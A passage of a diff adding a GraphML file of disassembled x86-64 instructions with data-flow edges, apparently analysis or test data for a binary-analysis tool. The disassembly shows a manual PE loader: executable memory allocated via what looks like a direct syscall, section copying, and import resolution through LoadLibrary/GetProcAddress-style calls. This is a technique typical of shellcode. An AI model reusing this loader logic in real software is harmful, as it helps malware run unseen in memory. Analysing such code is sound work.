+        <node id="block.0x129c:instruction.0x12ab">
+          <data key="address">0x12ab</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883ec48</data>
+          <data key="instruction.source">sub rsp, 0x48</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12af">
+          <data key="address">0x12af</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4831c0</data>
+          <data key="instruction.source">xor rax, rax</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12b2">
+          <data key="address">0x12b2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4889442438</data>
+          <data key="instruction.source">mov qword ptr [rsp + 0x38], rax</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12b7">
+          <data key="address">0x12b7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b442450</data>
+          <data key="instruction.source">mov eax, dword ptr [r12 + 0x50]</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12bc">
+          <data key="address">0x12bc</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4889442440</data>
+          <data key="instruction.source">mov qword ptr [rsp + 0x40], rax</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12c1">
+          <data key="address">0x12c1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48c7c1ffffffff</data>
+          <data key="instruction.source">mov rcx, 0xffffffffffffffff</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12c8">
+          <data key="address">0x12c8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488d542438</data>
+          <data key="instruction.source">lea rdx, [rsp + 0x38]</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12cd">
+          <data key="address">0x12cd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4d31c0</data>
+          <data key="instruction.source">xor r8, r8</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12d0">
+          <data key="address">0x12d0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8d4c2440</data>
+          <data key="instruction.source">lea r9, [rsp + 0x40]</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12d5">
+          <data key="address">0x12d5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c744242000300000</data>
+          <data key="instruction.source">mov dword ptr [rsp + 0x20], 0x3000</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12dd">
+          <data key="address">0x12dd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c744242840000000</data>
+          <data key="instruction.source">mov dword ptr [rsp + 0x28], 0x40</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12e5">
+          <data key="address">0x12e5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8b55e8</data>
+          <data key="instruction.source">mov r10, qword ptr [rbp - 0x18]</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12e9">
+          <data key="address">0x12e9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e8f0020000</data>
+          <data key="instruction.source">call 0x15de</data>
+        </node>
+        <edge source="block.0x129c:instruction.0x129c" target="block.0x129c:instruction.0x12a0"/>
+        <edge source="block.0x129c:instruction.0x129c" target="block.0x129c:instruction.0x12a3"/>
+        <edge source="block.0x129c:instruction.0x129c" target="block.0x129c:instruction.0x12c1"/>
+        <edge source="block.0x129c:instruction.0x12a0" target="block.0x129c:instruction.0x12a3"/>
+        <edge source="block.0x129c:instruction.0x12a0" target="block.0x129c:instruction.0x12af"/>
+        <edge source="block.0x129c:instruction.0x12a0" target="block.0x129c:instruction.0x12c1"/>
+        <edge source="block.0x129c:instruction.0x12a3" target="block.0x129c:instruction.0x12a7"/>
+        <edge source="block.0x129c:instruction.0x12a3" target="block.0x129c:instruction.0x12af"/>
+        <edge source="block.0x129c:instruction.0x12a3" target="block.0x129c:instruction.0x12b7"/>
+        <edge source="block.0x129c:instruction.0x12a3" target="block.0x129c:instruction.0x12c1"/>
+        <edge source="block.0x129c:instruction.0x12a7" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12af"/>
+        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12b2"/>
+        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12bc"/>
+        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12c8"/>
+        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12d0"/>
+        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12d5"/>
+        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12dd"/>
+        <edge source="block.0x129c:instruction.0x12ab" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129c:instruction.0x12af" target="block.0x129c:instruction.0x12b2"/>
+        <edge source="block.0x129c:instruction.0x12af" target="block.0x129c:instruction.0x12b7"/>
+        <edge source="block.0x129c:instruction.0x12af" target="block.0x129c:instruction.0x12cd"/>
+        <edge source="block.0x129c:instruction.0x12b2" target="block.0x129c:instruction.0x12b7"/>
+        <edge source="block.0x129c:instruction.0x12b2" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129c:instruction.0x12b7" target="block.0x129c:instruction.0x12bc"/>
+        <edge source="block.0x129c:instruction.0x12bc" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129c:instruction.0x12c1" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129c:instruction.0x12c8" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129c:instruction.0x12cd" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129c:instruction.0x12d0" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129c:instruction.0x12d5" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129c:instruction.0x12dd" target="block.0x129c:instruction.0x12e9"/>
+        <edge source="block.0x129c:instruction.0x12e5" target="block.0x129c:instruction.0x12e9"/>
+      </graph>
+    </node>
+    <node id="block.0x12ee">
+      <data key="address">0x12ee</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x12ee</data>
+        <data key="type">instructions</data>
+        <node id="block.0x12ee:instruction.0x12ee">
+          <data key="address">0x12ee</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b442438</data>
+          <data key="instruction.source">mov rax, qword ptr [rsp + 0x38]</data>
+        </node>
+        <node id="block.0x12ee:instruction.0x12f3">
+          <data key="address">0x12f3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883c448</data>
+          <data key="instruction.source">add rsp, 0x48</data>
+        </node>
+        <node id="block.0x12ee:instruction.0x12f7">
+          <data key="address">0x12f7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488945d0</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x30], rax</data>
+        </node>
+        <node id="block.0x12ee:instruction.0x12fb">
+          <data key="address">0x12fb</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b4c2454</data>
+          <data key="instruction.source">mov ecx, dword ptr [r12 + 0x54]</data>
+        </node>
+        <node id="block.0x12ee:instruction.0x1300">
+          <data key="address">0x1300</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b75d8</data>
+          <data key="instruction.source">mov rsi, qword ptr [rbp - 0x28]</data>
+        </node>
+        <node id="block.0x12ee:instruction.0x1304">
+          <data key="address">0x1304</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b7dd0</data>
+          <data key="instruction.source">mov rdi, qword ptr [rbp - 0x30]</data>
+        </node>
+        <edge source="block.0x12ee:instruction.0x12ee" target="block.0x12ee:instruction.0x12f3"/>
+        <edge source="block.0x12ee:instruction.0x12ee" target="block.0x12ee:instruction.0x12f7"/>
+      </graph>
+    </node>
+    <node id="block.0x1308">
+      <data key="address">0x1308</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1308</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1308:instruction.0x1308">
+          <data key="address">0x1308</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">f3a4</data>
+          <data key="instruction.source">rep movsb byte ptr [rdi], byte ptr [rsi]</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x130a">
+      <data key="address">0x130a</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x130a</data>
+        <data key="type">instructions</data>
+        <node id="block.0x130a:instruction.0x130a">
+          <data key="address">0x130a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">490fb7442414</data>
+          <data key="instruction.source">movzx rax, word ptr [r12 + 0x14]</data>
+        </node>
+        <node id="block.0x130a:instruction.0x1310">
+          <data key="address">0x1310</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4d8d6c0418</data>
+          <data key="instruction.source">lea r13, [r12 + rax + 0x18]</data>
+        </node>
+        <node id="block.0x130a:instruction.0x1315">
+          <data key="address">0x1315</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">450fb77c2406</data>
+          <data key="instruction.source">movzx r15d, word ptr [r12 + 6]</data>
+        </node>
+        <edge source="block.0x130a:instruction.0x130a" target="block.0x130a:instruction.0x1310"/>
+      </graph>
+    </node>
+    <node id="block.0x131b">
+      <data key="address">0x131b</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x131b</data>
+        <data key="type">instructions</data>
+        <node id="block.0x131b:instruction.0x131b">
+          <data key="address">0x131b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4585ff</data>
+          <data key="instruction.source">test r15d, r15d</data>
+        </node>
+        <node id="block.0x131b:instruction.0x131e">
+          <data key="address">0x131e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7425</data>
+          <data key="instruction.source">je 0x1345</data>
+        </node>
+        <edge source="block.0x131b:instruction.0x131b" target="block.0x131b:instruction.0x131e"/>
+      </graph>
+    </node>
+    <node id="block.0x1320">
+      <data key="address">0x1320</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1320</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1320:instruction.0x1320">
+          <data key="address">0x1320</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b450c</data>
+          <data key="instruction.source">mov eax, dword ptr [r13 + 0xc]</data>
+        </node>
+        <node id="block.0x1320:instruction.0x1324">
+          <data key="address">0x1324</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b7dd0</data>
+          <data key="instruction.source">mov rdi, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x1320:instruction.0x1328">
+          <data key="address">0x1328</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4801c7</data>
+          <data key="instruction.source">add rdi, rax</data>
+        </node>
+        <node id="block.0x1320:instruction.0x132b">
+          <data key="address">0x132b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b4514</data>
+          <data key="instruction.source">mov eax, dword ptr [r13 + 0x14]</data>
+        </node>
+        <node id="block.0x1320:instruction.0x132f">
+          <data key="address">0x132f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b75d8</data>
+          <data key="instruction.source">mov rsi, qword ptr [rbp - 0x28]</data>
+        </node>
+        <node id="block.0x1320:instruction.0x1333">
+          <data key="address">0x1333</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4801c6</data>
+          <data key="instruction.source">add rsi, rax</data>
+        </node>
+        <node id="block.0x1320:instruction.0x1336">
+          <data key="address">0x1336</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b4d10</data>
+          <data key="instruction.source">mov ecx, dword ptr [r13 + 0x10]</data>
+        </node>
+        <edge source="block.0x1320:instruction.0x1320" target="block.0x1320:instruction.0x1328"/>
+        <edge source="block.0x1320:instruction.0x1320" target="block.0x1320:instruction.0x132b"/>
+        <edge source="block.0x1320:instruction.0x1324" target="block.0x1320:instruction.0x1328"/>
+        <edge source="block.0x1320:instruction.0x1328" target="block.0x1320:instruction.0x132b"/>
+        <edge source="block.0x1320:instruction.0x1328" target="block.0x1320:instruction.0x1333"/>
+        <edge source="block.0x1320:instruction.0x132b" target="block.0x1320:instruction.0x1333"/>
+        <edge source="block.0x1320:instruction.0x132f" target="block.0x1320:instruction.0x1333"/>
+      </graph>
+    </node>
+    <node id="block.0x133a">
+      <data key="address">0x133a</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x133a</data>
+        <data key="type">instructions</data>
+        <node id="block.0x133a:instruction.0x133a">
+          <data key="address">0x133a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">f3a4</data>
+          <data key="instruction.source">rep movsb byte ptr [rdi], byte ptr [rsi]</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x133c">
+      <data key="address">0x133c</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x133c</data>
+        <data key="type">instructions</data>
+        <node id="block.0x133c:instruction.0x133c">
+          <data key="address">0x133c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4983c528</data>
+          <data key="instruction.source">add r13, 0x28</data>
+        </node>
+        <node id="block.0x133c:instruction.0x1340">
+          <data key="address">0x1340</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">41ffcf</data>
+          <data key="instruction.source">dec r15d</data>
+        </node>
+        <node id="block.0x133c:instruction.0x1343">
+          <data key="address">0x1343</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ebd6</data>
+          <data key="instruction.source">jmp 0x131b</data>
+        </node>
+        <edge source="block.0x133c:instruction.0x133c" target="block.0x133c:instruction.0x1340"/>
+        <edge source="block.0x133c:instruction.0x1340" target="block.0x133c:instruction.0x1343"/>
+      </graph>
+    </node>
+    <node id="block.0x1345">
+      <data key="address">0x1345</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1345</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1345:instruction.0x1345">
+          <data key="address">0x1345</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b842490000000</data>
+          <data key="instruction.source">mov eax, dword ptr [r12 + 0x90]</data>
+        </node>
+        <node id="block.0x1345:instruction.0x134d">
+          <data key="address">0x134d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x1345:instruction.0x134f">
+          <data key="address">0x134f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f84a5000000</data>
+          <data key="instruction.source">je 0x13fa</data>
+        </node>
+        <edge source="block.0x1345:instruction.0x1345" target="block.0x1345:instruction.0x134d"/>
+        <edge source="block.0x1345:instruction.0x134d" target="block.0x1345:instruction.0x134f"/>
+      </graph>
+    </node>
+    <node id="block.0x1355">
+      <data key="address">0x1355</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1355</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1355:instruction.0x1355">
+          <data key="address">0x1355</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8b75d0</data>
+          <data key="instruction.source">mov r14, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x1355:instruction.0x1359">
+          <data key="address">0x1359</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4901c6</data>
+          <data key="instruction.source">add r14, rax</data>
+        </node>
+        <edge source="block.0x1355:instruction.0x1355" target="block.0x1355:instruction.0x1359"/>
+      </graph>
+    </node>
+    <node id="block.0x135c">
+      <data key="address">0x135c</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x135c</data>
+        <data key="type">instructions</data>
+        <node id="block.0x135c:instruction.0x135c">
+          <data key="address">0x135c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b460c</data>
+          <data key="instruction.source">mov eax, dword ptr [r14 + 0xc]</data>
+        </node>
+        <node id="block.0x135c:instruction.0x1360">
+          <data key="address">0x1360</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x135c:instruction.0x1362">
+          <data key="address">0x1362</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f8492000000</data>
+          <data key="instruction.source">je 0x13fa</data>
+        </node>
+        <edge source="block.0x135c:instruction.0x135c" target="block.0x135c:instruction.0x1360"/>
+        <edge source="block.0x135c:instruction.0x1360" target="block.0x135c:instruction.0x1362"/>
+      </graph>
+    </node>
+    <node id="block.0x1368">
+      <data key="address">0x1368</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1368</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1368:instruction.0x1368">
+          <data key="address">0x1368</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4dd0</data>
+          <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x1368:instruction.0x136c">
+          <data key="address">0x136c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4801c1</data>
+          <data key="instruction.source">add rcx, rax</data>
+        </node>
+        <node id="block.0x1368:instruction.0x136f">
+          <data key="address">0x136f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883ec28</data>
+          <data key="instruction.source">sub rsp, 0x28</data>
+        </node>
+        <node id="block.0x1368:instruction.0x1373">
+          <data key="address">0x1373</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff55f8</data>
+          <data key="instruction.source">call qword ptr [rbp - 8]</data>
+        </node>
+        <edge source="block.0x1368:instruction.0x1368" target="block.0x1368:instruction.0x136c"/>
+        <edge source="block.0x1368:instruction.0x136c" target="block.0x1368:instruction.0x136f"/>
+        <edge source="block.0x1368:instruction.0x136f" target="block.0x1368:instruction.0x1373"/>
+      </graph>
+    </node>
+    <node id="block.0x1376">
+      <data key="address">0x1376</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1376</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1376:instruction.0x1376">
+          <data key="address">0x1376</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883c428</data>
+          <data key="instruction.source">add rsp, 0x28</data>
+        </node>
+        <node id="block.0x1376:instruction.0x137a">
+          <data key="address">0x137a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4989c5</data>
+          <data key="instruction.source">mov r13, rax</data>
+        </node>
+        <node id="block.0x1376:instruction.0x137d">
+          <data key="address">0x137d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b06</data>
+          <data key="instruction.source">mov eax, dword ptr [r14]</data>
+        </node>
+        <node id="block.0x1376:instruction.0x1380">
+          <data key="address">0x1380</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x1376:instruction.0x1382">
+          <data key="address">0x1382</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7504</data>
+          <data key="instruction.source">jne 0x1388</data>
+        </node>
+        <edge source="block.0x1376:instruction.0x1376" target="block.0x1376:instruction.0x1380"/>
+        <edge source="block.0x1376:instruction.0x137a" target="block.0x1376:instruction.0x137d"/>
+        <edge source="block.0x1376:instruction.0x137d" target="block.0x1376:instruction.0x1380"/>
+        <edge source="block.0x1376:instruction.0x1380" target="block.0x1376:instruction.0x1382"/>
+      </graph>
+    </node>
+    <node id="block.0x1384">
+      <data key="address">0x1384</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1384</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1384:instruction.0x1384">
+          <data key="address">0x1384</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b4610</data>
+          <data key="instruction.source">mov eax, dword ptr [r14 + 0x10]</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1388">
+      <data key="address">0x1388</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1388</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1388:instruction.0x1388">
+          <data key="address">0x1388</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b75d0</data>
+          <data key="instruction.source">mov rsi, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x1388:instruction.0x138c">
+          <data key="address">0x138c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4801c6</data>
+          <data key="instruction.source">add rsi, rax</data>
+        </node>
+        <node id="block.0x1388:instruction.0x138f">
+          <data key="address">0x138f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b4610</data>
+          <data key="instruction.source">mov eax, dword ptr [r14 + 0x10]</data>
+        </node>
+        <node id="block.0x1388:instruction.0x1393">
+          <data key="address">0x1393</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b7dd0</data>
+          <data key="instruction.source">mov rdi, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x1388:instruction.0x1397">
+          <data key="address">0x1397</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4801c7</data>
+          <data key="instruction.source">add rdi, rax</data>
+        </node>
+        <edge source="block.0x1388:instruction.0x1388" target="block.0x1388:instruction.0x138c"/>
+        <edge source="block.0x1388:instruction.0x138c" target="block.0x1388:instruction.0x138f"/>
+        <edge source="block.0x1388:instruction.0x138c" target="block.0x1388:instruction.0x1397"/>
+        <edge source="block.0x1388:instruction.0x138f" target="block.0x1388:instruction.0x1397"/>
+        <edge source="block.0x1388:instruction.0x1393" target="block.0x1388:instruction.0x1397"/>
+      </graph>
+    </node>
+    <node id="block.0x139a">
+      <data key="address">0x139a</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x139a</data>
+        <data key="type">instructions</data>
+        <node id="block.0x139a:instruction.0x139a">
+          <data key="address">0x139a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b06</data>
+          <data key="instruction.source">mov rax, qword ptr [rsi]</data>
+        </node>
+        <node id="block.0x139a:instruction.0x139d">
+          <data key="address">0x139d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c0</data>
+          <data key="instruction.source">test rax, rax</data>
+        </node>
+        <node id="block.0x139a:instruction.0x13a0">
+          <data key="address">0x13a0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">744f</data>
+          <data key="instruction.source">je 0x13f1</data>
+        </node>
+        <edge source="block.0x139a:instruction.0x139a" target="block.0x139a:instruction.0x139d"/>
+        <edge source="block.0x139a:instruction.0x139d" target="block.0x139a:instruction.0x13a0"/>
+      </graph>
+    </node>
+    <node id="block.0x13a2">
+      <data key="address">0x13a2</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13a2</data>
+        <data key="type">instructions</data>
+        <node id="block.0x13a2:instruction.0x13a2">
+          <data key="address">0x13a2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48b90000000000000080</data>
+          <data key="instruction.source">movabs rcx, 0x8000000000000000</data>
+        </node>
+        <node id="block.0x13a2:instruction.0x13ac">
+          <data key="address">0x13ac</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c8</data>
+          <data key="instruction.source">test rax, rcx</data>
+        </node>
+        <node id="block.0x13a2:instruction.0x13af">
+          <data key="address">0x13af</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7521</data>
+          <data key="instruction.source">jne 0x13d2</data>
+        </node>
+        <edge source="block.0x13a2:instruction.0x13a2" target="block.0x13a2:instruction.0x13ac"/>
+        <edge source="block.0x13a2:instruction.0x13ac" target="block.0x13a2:instruction.0x13af"/>
+      </graph>
+    </node>
+    <node id="block.0x13b1">
+      <data key="address">0x13b1</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13b1</data>
+        <data key="type">instructions</data>
+        <node id="block.0x13b1:instruction.0x13b1">
+          <data key="address">0x13b1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4dd0</data>
+          <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x13b1:instruction.0x13b5">
+          <data key="address">0x13b5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4801c1</data>
+          <data key="instruction.source">add rcx, rax</data>
+        </node>
+        <node id="block.0x13b1:instruction.0x13b8">
+          <data key="address">0x13b8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883c102</data>
+          <data key="instruction.source">add rcx, 2</data>
+        </node>
+        <node id="block.0x13b1:instruction.0x13bc">
+          <data key="address">0x13bc</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883ec28</data>
+          <data key="instruction.source">sub rsp, 0x28</data>
+        </node>
+        <node id="block.0x13b1:instruction.0x13c0">
+          <data key="address">0x13c0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4889ca</data>
+          <data key="instruction.source">mov rdx, rcx</data>
+        </node>
+        <node id="block.0x13b1:instruction.0x13c3">
+          <data key="address">0x13c3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c89e9</data>
+          <data key="instruction.source">mov rcx, r13</data>
+        </node>
+        <node id="block.0x13b1:instruction.0x13c6">
+          <data key="address">0x13c6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff55f0</data>
+          <data key="instruction.source">call qword ptr [rbp - 0x10]</data>
+        </node>
+        <edge source="block.0x13b1:instruction.0x13b1" target="block.0x13b1:instruction.0x13b5"/>
+        <edge source="block.0x13b1:instruction.0x13b5" target="block.0x13b1:instruction.0x13b8"/>
+        <edge source="block.0x13b1:instruction.0x13b8" target="block.0x13b1:instruction.0x13bc"/>
+        <edge source="block.0x13b1:instruction.0x13b8" target="block.0x13b1:instruction.0x13c0"/>
+        <edge source="block.0x13b1:instruction.0x13b8" target="block.0x13b1:instruction.0x13c3"/>
+        <edge source="block.0x13b1:instruction.0x13bc" target="block.0x13b1:instruction.0x13c6"/>
+        <edge source="block.0x13b1:instruction.0x13c0" target="block.0x13b1:instruction.0x13c3"/>
+        <edge source="block.0x13b1:instruction.0x13c3" target="block.0x13b1:instruction.0x13c6"/>
+      </graph>
+    </node>
+    <node id="block.0x13c9">
+      <data key="address">0x13c9</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13c9</data>
+        <data key="type">instructions</data>
+        <node id="block.0x13c9:instruction.0x13c9">
+          <data key="address">0x13c9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883c428</data>
+          <data key="instruction.source">add rsp, 0x28</data>
+        </node>
+        <node id="block.0x13c9:instruction.0x13cd">
+          <data key="address">0x13cd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488907</data>
+          <data key="instruction.source">mov qword ptr [rdi], rax</data>
+        </node>
+        <node id="block.0x13c9:instruction.0x13d0">
+          <data key="address">0x13d0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb15</data>
+          <data key="instruction.source">jmp 0x13e7</data>
+        </node>
+        <edge source="block.0x13c9:instruction.0x13c9" target="block.0x13c9:instruction.0x13d0"/>
+        <edge source="block.0x13c9:instruction.0x13cd" target="block.0x13c9:instruction.0x13d0"/>
+      </graph>
+    </node>
+    <node id="block.0x13d2">
+      <data key="address">0x13d2</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13d2</data>
+        <data key="type">instructions</data>
+        <node id="block.0x13d2:instruction.0x13d2">
+          <data key="address">0x13d2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">480fb716</data>
+          <data key="instruction.source">movzx rdx, word ptr [rsi]</data>
+        </node>
+        <node id="block.0x13d2:instruction.0x13d6">
+          <data key="address">0x13d6</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883ec28</data>
+          <data key="instruction.source">sub rsp, 0x28</data>
+        </node>
+        <node id="block.0x13d2:instruction.0x13da">
+          <data key="address">0x13da</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c89e9</data>
+          <data key="instruction.source">mov rcx, r13</data>
+        </node>
+        <node id="block.0x13d2:instruction.0x13dd">
+          <data key="address">0x13dd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff55f0</data>
+          <data key="instruction.source">call qword ptr [rbp - 0x10]</data>
+        </node>
+        <edge source="block.0x13d2:instruction.0x13d2" target="block.0x13d2:instruction.0x13dd"/>
+        <edge source="block.0x13d2:instruction.0x13d6" target="block.0x13d2:instruction.0x13dd"/>
+        <edge source="block.0x13d2:instruction.0x13da" target="block.0x13d2:instruction.0x13dd"/>
+      </graph>
+    </node>
+    <node id="block.0x13e0">
+      <data key="address">0x13e0</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13e0</data>
+        <data key="type">instructions</data>
+        <node id="block.0x13e0:instruction.0x13e0">
+          <data key="address">0x13e0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883c428</data>
+          <data key="instruction.source">add rsp, 0x28</data>
+        </node>
+        <node id="block.0x13e0:instruction.0x13e4">
+          <data key="address">0x13e4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488907</data>
+          <data key="instruction.source">mov qword ptr [rdi], rax</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x13e7">
+      <data key="address">0x13e7</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13e7</data>
